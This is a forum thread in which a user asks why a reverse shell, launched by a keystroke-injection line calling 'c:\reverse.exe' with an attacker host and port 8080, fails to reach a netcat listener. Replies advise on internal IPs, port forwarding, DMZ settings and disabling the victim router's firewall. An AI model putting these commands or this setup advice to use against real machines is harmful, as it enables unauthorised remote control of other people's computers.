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[Question] Reverse Shell Ip Address


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Ok I'm a bit rusty with BT5 Netcat, CMD, and coding in general, due to a year real changing stuff.

After hours of recalling my memory I keep getting brain farts

"STRING c:\reverse.exe evilserver.example.com 8080" - this is part i put my public ip address and i'm not sure I getting this right I've tried

"STRING c:\reverse.exe xx.xx.xxx.xxx 8080"

"STRING c:\reverse.exe http://xx.xx.xxx.xxx 8080"

"STRING c:\reverse.exe [couple of commands] xx.xx.xxx.xxx 8080"

I know I'm making some sort of noob error, but I can't figure out what

I keep getting nothing when I put "nc -l 8080"

*note* my dummy/victim PC has no AV

sorry for taking up your time with a stupid question

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If both computers you're working with are inside the same network, then try using the internal ip addresses given by your router. (Probably 192.168.1.x, but could be different)...

I take it you know how to get that on Windows, but if you don't, ipconfig in CMD will do it...

If they are on different networks, keep in mind that one of the routers (if not both) could have built in firewalls blocking the connection... Happened to me with my BT Home Hub...

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No, our house is a bit big and has thick concrete walls and i think has aluminum sheet in it. But anyways the two computer are on two different router(neighbor router) no firewalls are enable on each router. Both PCs are connected to the internet, no AVs, and i think I remember everything about I address.

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No, our house is a bit big and has thick concrete walls and i think has aluminum sheet in it. But anyways the two computer are on two different router(neighbor router) no firewalls are enable on each router. Both PCs are connected to the internet, no AVs, and i think I remember everything about I address.

Is the router your hacking from set as DMZ or have the proper ports forwarded to your internal ip?

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You could try creating an adhoc network with one of the computers to check to see if it is just the connection that is the problem. a Ad-Hoc network is basically one of more computers connecting to another. No internet is involved but it uses DHCP so internal ip adresses are assigned automatically.

Then you can ipconfig to find out what the ip addresses are and then try your script.

Also, in the firewall of the router of the victim, ensure that any active firewall is disabled momentarily during your test...

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Both Routers are from Netgear

I dought that the routers are to blame.

Just disabling the firewall does not allow open connections, the very nature of NAT makes most router configurations closed.

You must set your hacking computers router to forward all port 8080 to your ip assigned by that very router!!!

or just make your hacking computers ip the dmz in that router!!!

Not sure if what im saying is making sense or maybe your ahead of me already?

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